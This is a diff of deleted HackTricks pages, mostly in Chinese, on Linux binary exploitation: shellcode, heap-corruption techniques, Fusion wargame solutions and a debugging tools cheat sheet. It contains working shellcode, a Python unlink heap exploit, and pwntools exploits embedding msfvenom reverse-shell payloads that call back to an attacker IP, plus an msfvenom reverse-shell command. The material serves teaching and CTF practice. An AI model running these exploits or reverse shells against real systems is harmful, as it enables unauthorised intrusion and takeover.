**EJ 使用 Stack(/bin/sh):**
```
section .text
global _start
_start:
xor eax, eax ;Limpieza
mov al, 0x46 ; Syscall 70
xor ebx, ebx ; arg1 = 0
xor ecx, ecx ; arg2 = 0
int 0x80 ; setreuid(0,0)
xor eax, eax ; eax = 0
push eax ; “\0”
push dword 0x68732f2f ; “//sh”
push dword 0x6e69622f; “/bin”
mov ebx, esp ; arg1 = “/bin//sh\0”
push eax ; Null -> args[1]
push ebx ; “/bin/sh\0” -> args[0]
mov ecx, esp ; arg2 = args[]
mov al, 0x0b ; Syscall 11
int 0x80 ; excve(“/bin/sh”, args[“/bin/sh”, “NULL”], NULL)
```
**EJ FNSTENV:**
```
fabs
fnstenv [esp-0x0c]
pop eax ; Guarda el EIP en el que se ejecutó fabs
```
**Egg Huter:**
由一小段代码组成,该代码遍历与进程关联的内存页面,以寻找存储在其中的 shellcode查找 shellcode 中的某个签名)。在仅有小空间注入代码的情况下非常有用。
**Shellcodes polimórficos**
由加密的 shells 组成,这些 shells 具有一小段代码用于解密并跳转到它,使用 Call-Pop 技巧,这将是一个 **ejemplo cifrado cesar**
```
global _start
_start:
jmp short magic
init:
pop esi
xor ecx, ecx
mov cl,0 ; Hay que sustituir el 0 por la longitud del shellcode (es lo que recorrerá)
desc:
sub byte[esi + ecx -1], 0 ; Hay que sustituir el 0 por la cantidad de bytes a restar (cifrado cesar)
sub cl, 1
jnz desc
jmp short sc
magic:
call init
sc:
;Aquí va el shellcode
```
## **5.补充方法**
**Murat技术**
在linux中所有程序的映射从0xbfffffff开始。
通过观察linux中新进程的堆栈构建方式可以开发一个利用程序使得程序在一个唯一变量为shellcode的环境中启动。这个地址可以计算为addr = 0xbfffffff - 4 - strlen(完整可执行文件名) - strlen(shellcode)
这样就可以简单地获得包含shellcode的环境变量的地址。
这得益于execle函数允许创建一个只包含所需环境变量的环境。
##
###
###
###
###
### **格式字符串导致缓冲区溢出**
**sprintf**将格式化字符串**移动**到**变量**中。因此,您可以滥用字符串的**格式**来导致**变量中的缓冲区溢出**。\
例如,负载`%.44xAAAA`将**在变量中写入44B+"AAAA"**,这可能导致缓冲区溢出。
### **\_\_atexit结构**
> [!CAUTION]
> 现在利用这个是非常**奇怪的**。
**`atexit()`**是一个函数,**其他函数作为参数传递给它**。这些**函数**将在执行**`exit()`**或**main**的**返回**时被**执行**。\
如果您可以**修改**这些**函数**的**地址**以指向shellcode例如您将**获得对**该**进程的控制**,但这目前更复杂。\
目前要执行的**函数地址**被**隐藏**在多个结构后面,最终指向的地址不是函数的地址,而是**用XOR加密**和用**随机密钥**进行位移。因此目前这个攻击向量在x86和x64_86上**不是很有用**。\
**加密函数**是**`PTR_MANGLE`**。**其他架构**如m68k、mips32、mips64、aarch64、arm、hppa...**不实现加密**函数,因为它**返回与输入相同**。因此,这些架构可以通过这个向量进行攻击。
### **setjmp() & longjmp()**
> [!CAUTION]
> 现在利用这个是非常**奇怪的**。
**`setjmp()`**允许**保存****上下文**(寄存器)\
**`longjmp()`**允许**恢复****上下文**。\
**保存的寄存器**是:`EBX, ESI, EDI, ESP, EIP, EBP`\
发生的情况是EIP和ESP通过**`PTR_MANGLE`**函数传递,因此**易受此攻击的架构与上述相同**。\
它们对于错误恢复或中断很有用。\
然而,根据我所读到的,其他寄存器没有受到保护,**因此如果在被调用的函数内部有`call ebx``call esi``call edi`**则可以控制。或者您也可以修改EBP以修改ESP。
**C++中的VTable和VPTR**
每个类都有一个**Vtable**,它是一个**指向方法的指针数组**。
每个**类**的对象都有一个**VPtr**,它是指向其类数组的**指针**。VPtr是每个对象的头部的一部分因此如果实现了**VPtr的覆盖**,则可以**修改**为**指向**一个虚拟方法以便执行一个函数将转到shellcode。
## **预防措施和规避**
###
**Libsafe替换**
通过以下方式激活LD_PRELOAD=/lib/libsafe.so.2\
或\
“/lib/libsave.so.2” > /etc/ld.so.preload
它拦截对某些不安全函数的调用替换为安全的函数。没有标准化。仅适用于x86不适用于使用-fomit-frame-pointer的编译不适用于静态编译并非所有易受攻击的函数都变得安全LD_PRELOAD在具有suid的二进制文件中无效
**ASCII装甲地址空间**
它涉及将共享库加载到0x00000000到0x00ffffff之间以确保始终有一个字节0x00。然而这实际上几乎无法阻止任何攻击尤其是在小端模式下。
**ret2plt**
它涉及执行ROP以便调用strcpy@plt来自plt并指向GOT的入口并将要调用的函数的第一个字节复制到那里system()。接下来做同样的事情指向GOT+1并复制system()的第二个字节……最后调用保存在GOT中的地址这将是system()。
**使用chroot()的监狱**
debootstrap -arch=i386 hardy /home/user —> 在特定子目录下安装基本系统
管理员可以通过以下方式退出这些监狱mkdir foo; chroot foo; cd ..
**代码插装**
Valgrind —> 查找错误\
Memcheck\
RAD返回地址防御者\
Insure++
## **8 堆溢出:基本利用**
**分配块**
prev_size |\
size | —头部\
\*mem | 数据
**空闲块**
prev_size |\
size |\
\*fd | 前向块指针\
\*bk | 后向块指针 —头部\
\*mem | 数据
空闲块在一个双向链表bin且不能有两个空闲块相邻会合并
在“size”中有位表示如果前一个块正在使用如果块是通过mmap()分配的以及块是否属于主arena。
如果释放一个块时任何相邻块是空闲的这些块将通过宏unlink()合并并将新的更大的块传递给frontlink()以插入适当的bin。
unlink(){\
BK = P->bk; —> 新块的BK是之前空闲块的BK\
FD = P->fd; —> 新块的FD是之前空闲块的FD\
FD->bk = BK; —> 下一个块的BK指向新块\
BK->fd = FD; —> 上一个块的FD指向新块\
}
因此如果我们能够将P->bk修改为shellcode的地址并将P->fd修改为GOT或DTORS的入口地址减去12则可以实现
BK = P->bk = \&shellcode\
FD = P->fd = &\_\_dtor_end\_\_ - 12\
FD->bk = BK -> \*((&\_\_dtor_end\_\_ - 12) + 12) = \&shellcode
这样在程序退出时将执行shellcode。
此外unlink()的第4条语句写入某些内容shellcode必须为此进行修复
BK->fd = FD -> \*(\&shellcode + 8) = (&\_\_dtor_end\_\_ - 12) —> 这将导致从shellcode的第8个字节开始写入4个字节因此shellcode的第一条指令必须是一个jmp以跳过这一部分并落入一些nops中继续执行其余的shellcode。
因此,利用程序的创建如下:
在buffer1中放入shellcode从jmp开始以便落入nops或其余的shellcode。
在shellcode之后填充直到到达下一个块的prev_size和size字段。在这些位置放入0xfffffff0以便覆盖prev_size使其具有表示空闲的位和“-4”0xfffffffc在size中以便当检查第三个块时如果第二个块实际上是空闲的它将转到修改后的prev_size告诉它是空闲的-> 这样当free()检查时它将转到第三个块的size但实际上将转到第二个块-4并认为第二个块是空闲的。然后将调用**unlink()**。
调用unlink()时将使用第二个块的前几个数据作为P->fd因此将放入要覆盖的地址-12因为在FD->bk中将加12到存储在FD中的地址。在该地址中将放入第二个块中找到的地址我们希望它是指向shellcode的地址伪造的P->bk
**from struct import \***
**import os**
**shellcode = "\xeb\x0caaaabbbbcccc" #jm 12 + 12字节填充**
**shellcode += "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" \\**
**"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" \\**
**"\x80\xe8\xdc\xff\xff\xff/bin/sh";**
**prev_size = pack("\<I”, 0xfffffff0) #需要确保表示前一个块空闲的位为1**
**fake_size = pack("\<I”, 0xfffffffc) #-4以便它认为第三个块的“size”在4字节之前指向prev_size因为它在这里检查第二个块是否空闲**
**addr_sc = pack("\<I", 0x0804a008 + 8) #在负载的开头放入8字节的填充**
**got_free = pack("\<I", 0x08048300 - 12) #free()在plt中的地址-12将是覆盖的地址以便在第二次调用free时触发shellcode**
**payload = "aaaabbbb" + shellcode + "b"\*(512-len(shellcode)-8) #如前所述负载以8字节的填充开始**
**payload += prev_size + fake_size + got_free + addr_sc #修改第二个块got_free指向我们将存储地址addr_sc + 12的地方**
**os.system("./8.3.o " + payload)**
**unset() 以相反的顺序释放wargame**
我们控制3个连续的块并以与分配的相反顺序释放它们。
在这种情况下:
在块c中放入shellcode
块a用于覆盖块b以便size具有PREV_INUSE位被禁用从而使其认为块a是空闲的。
此外在块b的头部覆盖size使其值为-4。
因此程序将认为“a”是空闲的并在一个bin中因此将调用unlink()以解除链接。然而由于头部PREV_SIZE的值为-4。它将认为“a”的块实际上从b+4开始。也就是说它将对从b+4开始的块进行unlink()因此在b+12处将是指针“fd”在b+16处将是指针“bk”。
因此如果在bk中放入指向shellcode的地址并在fd中放入指向“puts()”-12的地址我们就得到了我们的负载。
**前链技术**
当释放某个块且其相邻的块都不空闲时称为前链不会调用unlink()而是直接调用frontlink()。
当攻击的malloc从未被释放时这种漏洞很有用。
需要:
一个可以通过输入数据的函数溢出的缓冲区
一个与此相邻的缓冲区必须被释放并且其头部的fd字段将通过前一个缓冲区的溢出进行修改
一个要释放的缓冲区其大小大于512但小于前一个缓冲区
在步骤3之前声明的缓冲区允许覆盖此缓冲区的prev_size
通过这种方式能够在两个malloc中以不受控制的方式进行覆盖并在一个中以受控制的方式进行覆盖但只释放那个可以进行利用。
**双重释放漏洞**
如果对同一指针调用两次free()则会有两个bins指向同一地址。
如果想要再次使用其中一个将毫无问题地分配。如果想使用另一个则会分配相同的空间因此我们将有伪造的“fd”和“bk”指针包含先前分配的数据。
**释放后**
一个先前释放的指针在没有控制的情况下再次使用。
## **8 堆溢出:高级利用**
unlink()和frontlink()技术在修改unlink()函数后被删除。
**心灵之家**
只需一次free()调用即可引发任意代码的执行。需要寻找一个可以被先前释放的块溢出的第二个块。
一次free()调用会导致调用public_fREe(mem),它执行:
mstate ar_ptr;
mchunkptr p;
p = mem2chunk(mem); —> 返回指向块开始的地址的指针mem-8
ar_ptr = arena_for_chunk(p); —> chunk_non_main_arena(ptr)?heap_for_ptr(ptr)->ar_ptr:\&main_arena \[1]
\_int_free(ar_ptr, mem);
}
在\[1]中检查size字段的NON_MAIN_ARENA位可以更改以使检查返回true并执行heap_for_ptr()该函数对“mem”进行与运算将2.5个最不重要的字节置为0在我们的情况下从0x0804a000变为0x08000000并访问0x08000000->ar_ptr就像是一个struct heap_info
通过这种方式如果我们可以控制一个块例如在0x0804a000并且将释放一个块在**0x081002a0**我们可以到达地址0x08100000并写入我们想要的内容例如**0x0804a000**。当第二个块被释放时将发现heap_for_ptr(ptr)->ar_ptr返回我们在0x08100000中写入的内容因为对0x081002a0应用了之前看到的与运算从中提取前4个字节的值即ar_ptr
通过这种方式调用\_int_free(ar_ptr, mem),即**\_int_free(0x0804a000, 0x081002a0)**\
**\_int_free(mstate av, Void_t\* mem){**\
…\
bck = unsorted_chunks(av);\
fwd = bck->fd;\
p->bk = bck;\
p->fd = fwd;\
bck->fd = p;\
fwd->bk = p;
..}
正如我们之前看到的我们可以控制av的值因为这是我们在将要释放的块中写入的内容。
根据unsorted_chunks的定义我们知道\
bck = \&av->bins\[2]-8;\
fwd = bck->fd = \*(av->bins\[2]);\
fwd->bk = \*(av->bins\[2] + 12) = p;
因此如果在av->bins\[2]中写入\_\_DTOR_END\_\_-12的值在最后一条指令中将写入\_\_DTOR_END\_\_的地址。
也就是说,在第一个块的开头多次放入\_\_DTOR_END\_\_-12的地址因为av->bins\[2]将从那里获取。
在最后5个零的第二个块的地址中需要写入指向第一个块的地址以便heap_for_ptr()认为ar_ptr位于第一个块的开头并从中提取av->bins\[2]。
在第二个块中借助第一个块我们将prev_size覆盖为一个跳转0x0c并将size设置为某个值以激活-> NON_MAIN_ARENA。
接下来在块2中放入一堆nops最后是shellcode。
通过这种方式,将调用\_int_free(TROZO1, TROZO2),并按照指示在\_\_DTOR_END\_\_中写入第二个块的prev_size地址该地址将跳转到shellcode。
要应用此技术,还需要满足一些额外的要求,这使得负载更加复杂。
此技术不再适用因为对unlink应用了几乎相同的补丁。它们比较新的指针是否也指向自己。
**快速bin**
这是心灵之家的一个变体。
我们希望在通过\_int_free()的第一次检查后执行以下代码:
fb = &(av->fastbins\[fastbin_index(size)] —> 其中fastbin_index(sz) —> (sz >> 3) - 2
p->fd = \*fb
\*fb = p
通过这种方式如果在“fb”中放入指向GOT中某个函数的地址则将在该地址中放入指向被覆盖块的地址。为此arena必须接近dtors的地址。更确切地说av->max_fast必须在我们要覆盖的地址中。
由于在心灵之家中我们看到我们控制了av的位置。
因此如果在size字段中放入8 + NON_MAIN_ARENA + PREV_INUSE —> fastbin_index()将返回fastbins\[-1]这将指向av->max_fast。
在这种情况下av->max_fast将是要被覆盖的地址而不是指向的地址而是该位置将被覆盖
此外必须满足释放的相邻块必须大于8的条件-> 由于我们说释放的块的size为8因此在这个伪造的块中只需放入大于8的size因为shellcode将放在释放的块中因此在开头需要放入一个jmp跳转到nops
此外该伪造块必须小于av->system_mem。av->system_mem位于更高1848字节的位置。
由于\_DTOR_END\_的零和GOT中可用地址的稀缺这些部分中的任何地址都无法被覆盖因此让我们看看如何应用快速bin来攻击堆栈。
另一种攻击方式是将**av**重定向到堆栈。
如果我们将size修改为16而不是8fastbin_index()将返回fastbins\[0],我们可以利用这一点来覆盖堆栈。
为此堆栈中不能有任何canary或奇怪的值实际上我们必须处于4个零字节 + EBP + RET
需要4个零字节以确保**av**位于该地址,并且**av**的第一个元素是必须为0的互斥体。
**av->max_fast**将是EBP并且将是一个值帮助我们跳过限制。
在**av->fastbins\[0]**中将被覆盖为**p**的地址并将是RET这样将跳转到shellcode。
此外,在**av->system_mem**在堆栈位置上方1484字节将有足够的垃圾允许我们跳过进行的检查。
此外必须满足释放的相邻块必须大于8的条件-> 由于我们说释放的块的size为16因此在这个伪造的块中只需放入大于8的size因为shellcode将放在释放的块中因此在开头需要放入一个jmp跳转到nops位于新伪造块的size字段之后
**精神之家**
在这种情况下我们希望拥有一个可以被攻击者修改的malloc指针例如指针位于可能溢出的变量下方的堆栈中
这样我们可以使该指针指向任何地方。然而并非所有位置都是有效的伪造块的大小必须小于av->max_fast更具体地说必须等于未来malloc()调用中请求的大小+8。因此如果我们知道在此可变指针后会调用malloc(40)则伪造块的大小必须等于48。
例如如果程序询问用户输入一个数字我们可以输入48并将可修改的malloc指针指向接下来的4个字节如果运气好可能属于EBP因此48位于后面就像是头部size。此外地址ptr-4+48必须满足多个条件在这种情况下ptr=EBP即8 < ptr-4+48 < av->system_mem。
如果满足这些条件当调用我们之前提到的malloc(40)时将分配给EBP的地址。如果攻击者还可以控制写入此malloc的内容则可以用所需的地址覆盖EBP和EIP。
我认为这是因为当释放时free()将记录在指向堆栈的EBP的地址中有一个适合新malloc()请求的块,因此将分配该地址。
**力量之家**
需要:
- 溢出一个块以覆盖wilderness
- 一次malloc()调用,大小由用户定义
- 一次malloc()调用,其数据可以由用户定义
首先覆盖wilderness块的size为一个非常大的值0xffffffff因此任何足够大的内存请求将在\_int_malloc()中处理,而无需扩展堆。
其次修改av->top使其指向攻击者控制的内存区域例如堆栈。在av->top中放入\&EIP - 8。
我们必须覆盖av->top使其指向攻击者控制的内存区域
victim = av->top;
remainder = chunck_at_offset(victim, nb);
av->top = remainder;
Victim获取当前wilderness块的地址当前av->top而remainder正好是该地址加上malloc()请求的字节数。因此,如果\&EIP-8在0xbffff224av->top包含0x080c2788则我们在控制的malloc中需要保留的数量以便av->top指向$EIP-8的下一个malloc()将是:
0xbffff224 - 0x080c2788 = 3086207644。
因此av->top将保存修改后的值下一个malloc将指向EIP并能够覆盖它。
重要的是新的wilderness块的size必须大于最后一次malloc()请求的大小。也就是说如果wilderness指向\&EIP-8size将正好位于堆栈的EBP字段中。
**传说之家**
**SmallBin腐败**
释放的块根据其大小插入bin。但在插入之前它们会保留在未排序的bins中。释放的块不会立即放入其bin而是停留在未排序的bins中。接下来如果请求一个新块而之前释放的块可以使用则将其返回但如果请求更大的块则未排序的bins中的释放块将放入其适当的bin中。
要达到易受攻击的代码内存请求必须大于av->max_fast通常为72且小于MIN_LARGE_SIZE512
如果bin中有适合请求的块则在解除链接后返回该块
bck = victim->bk; 指向前一个块,这是我们可以更改的唯一信息。
bin->bk = bck; 倒数第二个块变为最后一个如果bck指向堆栈则下一个请求的块将获得此地址。
bck->fd = bin; 关闭列表使其指向bin。
需要:
请求两个malloc以便在第一个malloc释放后可以溢出第二个malloc在溢出之前请求一个大于第二个块的malloc
请求的malloc由攻击者控制。
目标如下如果我们可以对一个堆溢出且其下方有一个已释放的块并在其bin中我们可以更改其bk指针。如果我们更改其bk指针并且该块成为bin列表的第一个块并被请求则bin将被欺骗告知最后一个块的地址下一个提供的块在我们放置的虚假地址例如堆栈或GOT中。因此如果再次请求另一个块并且攻击者在其中有权限则将提供一个块在所需位置并且可以在其中写入。
在释放修改后的块后必须请求一个大于已释放块的块这样修改后的块将从未排序的bins中移出并放入其bin中。
一旦在其bin中是时候通过溢出修改其bk指针以便指向我们想要覆盖的地址。
因此bin将等待足够多的malloc()调用以便再次使用修改后的bin并欺骗bin使其认为下一个块在虚假地址中。然后将提供我们感兴趣的块。
为了尽快执行漏洞,理想情况下是:请求易受攻击的块,请求将被修改的块,释放该块,请求一个大于将被修改的块,修改该块(漏洞),请求与被修改的块相同大小的块,并请求第二个相同大小的块,这将指向所选地址。
为了保护此攻击使用了典型的检查以确保块“不是”虚假的检查bck->fd是否指向victim。也就是说在我们的情况下检查指向堆栈中虚假块的fd*指针是否指向victim。为了绕过此保护攻击者应能够以某种方式可能通过堆栈在适当的地址写入victim的地址。这样看起来就像是一个真实的块。
**LargeBin腐败**
需要与之前相同的要求以及更多要求此外已请求的块必须大于512。
攻击与之前相同即需要修改bk指针并且需要所有这些malloc()调用但还需要修改修改块的size以便该size - nb < MINSIZE
例如将size设置为1552以便1552 - 1544 = 8 < MINSIZE减法不能为负因为比较的是无符号数
此外,已引入补丁以使其更加复杂。
**堆喷涂**
基本上它涉及请求尽可能多的堆内存并用以nops结尾的shellcode填充这些内存。此外作为填充使用0x0c。因为将尝试跳转到地址0x0c0c0c0c因此如果覆盖了将要调用的某个地址则将跳转到那里。基本上策略是请求尽可能多的内存以查看是否覆盖了某个指针并跳转到0x0c0c0c0c期待那里有nops。
**堆风水**
通过请求和释放内存,旨在使内存中保留已请求块与空闲块之间的块。要溢出的缓冲区将位于其中一个块中。
**objdump -d 可执行文件** —> 反汇编函数\
**objdump -d ./PROGRAM | grep FUNCTION** —> 获取函数地址\
**objdump -d -Mintel ./shellcodeout** —> 查看确实是我们的shellcode并提取操作码\
**objdump -t ./exec | grep varBss** —> 符号表,以提取变量和函数的地址\
**objdump -TR ./exec | grep exit(func lib)** —> 提取库函数的地址GOT\
**objdump -d ./exec | grep funcCode**\
**objdump -s -j .dtors /exec**\
**objdump -s -j .got ./exec**\
**objdump -t --dynamic-relo ./exec | grep puts** —> 提取要在GOT中覆盖的puts地址\
**objdump -D ./exec** —> 反汇编所有内容直到plt的条目\
**objdump -p -/exec**\
**Info functions strncmp —>** gdb中的函数信息
## 有趣的课程
- [https://guyinatuxedo.github.io/](https://guyinatuxedo.github.io)
- [https://github.com/RPISEC/MBE](https://github.com/RPISEC/MBE)
- [https://ir0nstone.gitbook.io/notes](https://ir0nstone.gitbook.io/notes)
## **参考文献**
- [**https://guyinatuxedo.github.io/7.2-mitigation_relro/index.html**](https://guyinatuxedo.github.io/7.2-mitigation_relro/index.html)
{{#include ../../banners/hacktricks-training.md}}

60
src/exploiting/linux-exploiting-basic-esp/fusion.md
View File

@ -1,60 +0,0 @@
{{#include ../../banners/hacktricks-training.md}}
# Level00
[http://exploit-exercises.lains.space/fusion/level00/](http://exploit-exercises.lains.space/fusion/level00/)
1. 获取修改 EIP 的偏移量
2. 将 shellcode 地址放入 EIP
```python
from pwn import *
r = remote("192.168.85.181", 20000)
buf = "GET " # Needed
buf += "A"*139 # Offset 139
buf += p32(0xbffff440) # Stack address where the shellcode will be saved
buf += " HTTP/1.1" # Needed
buf += "\x90"*100 # NOPs
#msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.85.178 LPORT=4444 -a x86 --platform linux -b '\x00\x2f' -f python
buf += "\xdb\xda\xb8\x3b\x50\xff\x66\xd9\x74\x24\xf4\x5a\x2b"
buf += "\xc9\xb1\x12\x31\x42\x17\x83\xea\xfc\x03\x79\x43\x1d"
buf += "\x93\x4c\xb8\x16\xbf\xfd\x7d\x8a\x2a\x03\x0b\xcd\x1b"
buf += "\x65\xc6\x8e\xcf\x30\x68\xb1\x22\x42\xc1\xb7\x45\x2a"
buf += "\x12\xef\xe3\x18\xfa\xf2\x0b\x4d\xa7\x7b\xea\xdd\x31"
buf += "\x2c\xbc\x4e\x0d\xcf\xb7\x91\xbc\x50\x95\x39\x51\x7e"
buf += "\x69\xd1\xc5\xaf\xa2\x43\x7f\x39\x5f\xd1\x2c\xb0\x41"
buf += "\x65\xd9\x0f\x01"
r.recvline()
r.send(buf)
r.interactive()
```
# Level01
```python
from pwn import *
r = remote("192.168.85.181", 20001)
buf = "GET " # Needed
buf += "A"*139 # Offset 139
buf += p32(0x08049f4f) # Adress of: JMP esp
buf += p32(0x9090E6FF) # OPCODE: JMP esi (the esi register have the address of the shellcode)
buf += " HTTP/1.1" # Needed
buf += "\x90"*100 # NOPs
#msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.85.178 LPORT=4444 -a x86 --platform linux -b '\x00\x2f' -f python
buf += "\xdb\xda\xb8\x3b\x50\xff\x66\xd9\x74\x24\xf4\x5a\x2b"
buf += "\xc9\xb1\x12\x31\x42\x17\x83\xea\xfc\x03\x79\x43\x1d"
buf += "\x93\x4c\xb8\x16\xbf\xfd\x7d\x8a\x2a\x03\x0b\xcd\x1b"
buf += "\x65\xc6\x8e\xcf\x30\x68\xb1\x22\x42\xc1\xb7\x45\x2a"
buf += "\x12\xef\xe3\x18\xfa\xf2\x0b\x4d\xa7\x7b\xea\xdd\x31"
buf += "\x2c\xbc\x4e\x0d\xcf\xb7\x91\xbc\x50\x95\x39\x51\x7e"
buf += "\x69\xd1\xc5\xaf\xa2\x43\x7f\x39\x5f\xd1\x2c\xb0\x41"
buf += "\x65\xd9\x0f\x01"
r.send(buf)
r.interactive()
```
{{#include ../../banners/hacktricks-training.md}}

210
src/exploiting/tools/README.md
View File

@ -1,210 +0,0 @@
# 利用工具
{{#include ../../banners/hacktricks-training.md}}
## Metasploit
```
pattern_create.rb -l 3000 #Length
pattern_offset.rb -l 3000 -q 5f97d534 #Search offset
nasm_shell.rb
nasm> jmp esp #Get opcodes
msfelfscan -j esi /opt/fusion/bin/level01
```
### Shellcodes
```
msfvenom /p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> [EXITFUNC=thread] [-e x86/shikata_ga_nai] -b "\x00\x0a\x0d" -f c
```
## GDB
### 安装
```
apt-get install gdb
```
### 参数
```bash
-q # No show banner
-x <file> # Auto-execute GDB instructions from here
-p <pid> # Attach to process
```
### 指令
```bash
run # Execute
start # Start and break in main
n/next/ni # Execute next instruction (no inside)
s/step/si # Execute next instruction
c/continue # Continue until next breakpoint
p system # Find the address of the system function
set $eip = 0x12345678 # Change value of $eip
help # Get help
quit # exit
# Disassemble
disassemble main # Disassemble the function called main
disassemble 0x12345678 # Disassemble taht address
set disassembly-flavor intel # Use intel syntax
set follow-fork-mode child/parent # Follow child/parent process
# Breakpoints
br func # Add breakpoint to function
br *func+23
br *0x12345678
del <NUM> # Delete that number of breakpoint
watch EXPRESSION # Break if the value changes
# info
info functions --> Info abount functions
info functions func --> Info of the funtion
info registers --> Value of the registers
bt # Backtrace Stack
bt full # Detailed stack
print variable
print 0x87654321 - 0x12345678 # Caculate
# x/examine
examine/<num><o/x/d/u/t/i/s/c><b/h/w/g> dir_mem/reg/puntero # Shows content of <num> in <octal/hexa/decimal/unsigned/bin/instruction/ascii/char> where each entry is a <Byte/half word (2B)/Word (4B)/Giant word (8B)>
x/o 0xDir_hex
x/2x $eip # 2Words from EIP
x/2x $eip -4 # $eip - 4
x/8xb $eip # 8 bytes (b-> byte, h-> 2bytes, w-> 4bytes, g-> 8bytes)
i r eip # Value of $eip
x/w pointer # Value of the pointer
x/s pointer # String pointed by the pointer
x/xw &pointer # Address where the pointer is located
x/i $eip # Instructions of the EIP
```
### [GEF](https://github.com/hugsy/gef)
```bash
help memory # Get help on memory command
canary # Search for canary value in memory
checksec #Check protections
p system #Find system function address
search-pattern "/bin/sh" #Search in the process memory
vmmap #Get memory mappings
xinfo <addr> # Shows page, size, perms, memory area and offset of the addr in the page
memory watch 0x784000 0x1000 byte #Add a view always showinf this memory
got #Check got table
memory watch $_got()+0x18 5 #Watch a part of the got table
# Vulns detection
format-string-helper #Detect insecure format strings
heap-analysis-helper #Checks allocation and deallocations of memory chunks:NULL free, UAF,double free, heap overlap
#Patterns
pattern create 200 #Generate length 200 pattern
pattern search "avaaawaa" #Search for the offset of that substring
pattern search $rsp #Search the offset given the content of $rsp
#Shellcode
shellcode search x86 #Search shellcodes
shellcode get 61 #Download shellcode number 61
#Another way to get the offset of to the RIP
1- Put a bp after the function that overwrites the RIP and send a ppatern to ovwerwrite it
2- ef➤ i f
Stack level 0, frame at 0x7fffffffddd0:
rip = 0x400cd3; saved rip = 0x6261617762616176
called by frame at 0x7fffffffddd8
Arglist at 0x7fffffffdcf8, args:
Locals at 0x7fffffffdcf8, Previous frame's sp is 0x7fffffffddd0
Saved registers:
rbp at 0x7fffffffddc0, rip at 0x7fffffffddc8
gef➤ pattern search 0x6261617762616176
[+] Searching for '0x6261617762616176'
[+] Found at offset 184 (little-endian search) likely
```
### Tricks
#### GDB 相同地址
在调试时GDB 的 **地址会与执行时二进制文件使用的地址略有不同。** 你可以通过以下方式使 GDB 拥有相同的地址:
- `unset env LINES`
- `unset env COLUMNS`
- `set env _=<path>` _输入二进制文件的绝对路径_
- 使用相同的绝对路径利用二进制文件
- 使用 GDB 和利用二进制文件时,`PWD``OLDPWD` 必须相同
#### 回溯以查找调用的函数
当你有一个 **静态链接的二进制文件** 时,所有函数将属于该二进制文件(而不是外部库)。在这种情况下,**识别二进制文件的执行流程以例如请求用户输入** 将会很困难。\
你可以通过 **运行** 二进制文件并 **使用 gdb** 直到被要求输入来轻松识别这个流程。然后,使用 **CTRL+C** 停止它,并使用 **`bt`** **回溯**)命令查看调用的函数:
```
gef➤ bt
#0 0x00000000004498ae in ?? ()
#1 0x0000000000400b90 in ?? ()
#2 0x0000000000400c1d in ?? ()
#3 0x00000000004011a9 in ?? ()
#4 0x0000000000400a5a in ?? ()
```
### GDB 服务器
`gdbserver --multi 0.0.0.0:23947`(在 IDA 中,您必须填写 Linux 机器上可执行文件的绝对路径,在 Windows 机器上也是如此)
## Ghidra
### 查找栈偏移量
**Ghidra** 非常有用,可以找到 **缓冲区溢出的偏移量,感谢有关局部变量位置的信息。**\
例如,在下面的示例中,`local_bc` 中的缓冲区流表明您需要 `0xbc` 的偏移量。此外,如果 `local_10` 是一个金丝雀 cookie则表明要从 `local_bc` 覆盖它需要 `0xac` 的偏移量。\
_请记住保存 RIP 的前 0x08 属于 RBP。_
![](<../../images/image (616).png>)
## GCC
**gcc -fno-stack-protector -D_FORTIFY_SOURCE=0 -z norelro -z execstack 1.2.c -o 1.2** --> 在没有保护的情况下编译\
**-o** --> 输出\
**-g** --> 保存代码GDB 将能够看到它)\
**echo 0 > /proc/sys/kernel/randomize_va_space** --> 在 Linux 中停用 ASLR
**编译 shellcode**\
**nasm -f elf assembly.asm** --> 返回一个 ".o"\
**ld assembly.o -o shellcodeout** --> 可执行文件
## Objdump
**-d** --> **反汇编可执行**部分(查看编译的 shellcode 的操作码,查找 ROP Gadget查找函数地址...\
**-Mintel** --> **Intel** 语法\
**-t** --> **符号**表\
**-D** --> **反汇编所有**(静态变量的地址)\
**-s -j .dtors** --> dtors 部分\
**-s -j .got** --> got 部分\
\-D -s -j .plt --> **plt** 部分 **反编译**\
**-TR** --> **重定位**\
**ojdump -t --dynamic-relo ./exec | grep puts** --> 在 GOT 中修改 "puts" 的地址\
**objdump -D ./exec | grep "VAR_NAME"** --> 静态变量的地址(这些存储在 DATA 部分)。
## 核转储
1. 在启动我的程序之前运行 `ulimit -c unlimited`
2. 运行 `sudo sysctl -w kernel.core_pattern=/tmp/core-%e.%p.%h.%t`
3. sudo gdb --core=\<path/core> --quiet
## 更多
**ldd executable | grep libc.so.6** --> 地址(如果 ASLR则每次都会更改\
**for i in \`seq 0 20\`; do ldd \<Ejecutable> | grep libc; done** --> 循环查看地址是否变化很大\
**readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system** --> "system" 的偏移量\
**strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh** --> "/bin/sh" 的偏移量
**strace executable** --> 可执行文件调用的函数\
**rabin2 -i ejecutable -->** 所有函数的地址
## **Inmunity 调试器**
```bash
!mona modules #Get protections, look for all false except last one (Dll of SO)
!mona find -s "\xff\xe4" -m name_unsecure.dll #Search for opcodes insie dll space (JMP ESP)
```
## IDA
### 在远程 Linux 中调试
在 IDA 文件夹中,您可以找到可以用于在 Linux 中调试二进制文件的二进制文件。要做到这一点,将二进制文件 _linux_server_ 或 _linux_server64_ 移动到 Linux 服务器中,并在包含该二进制文件的文件夹中运行它:
```
./linux_server64 -Ppass
```
然后配置调试器调试器linux 远程) --> 进程选项...
![](<../../images/image (101).png>)
{{#include ../../banners/hacktricks-training.md}}

146
src/exploiting/tools/pwntools.md
View File

@ -1,146 +0,0 @@
{{#include ../../banners/hacktricks-training.md}}
```
pip3 install pwntools
```
# Pwn asm
从行或文件中获取操作码。
```
pwn asm "jmp esp"
pwn asm -i <filepath>
```
**可以选择:**
- 输出类型 (raw, hex, string, elf)
- 输出文件上下文 (16, 32, 64, linux, windows...)
- 避免字节 (新行, null, 列表)
- 选择编码器调试 shellcode 使用 gdb 运行输出
# **Pwn checksec**
Checksec 脚本
```
pwn checksec <executable>
```
# Pwn constgrep
# Pwn cyclic
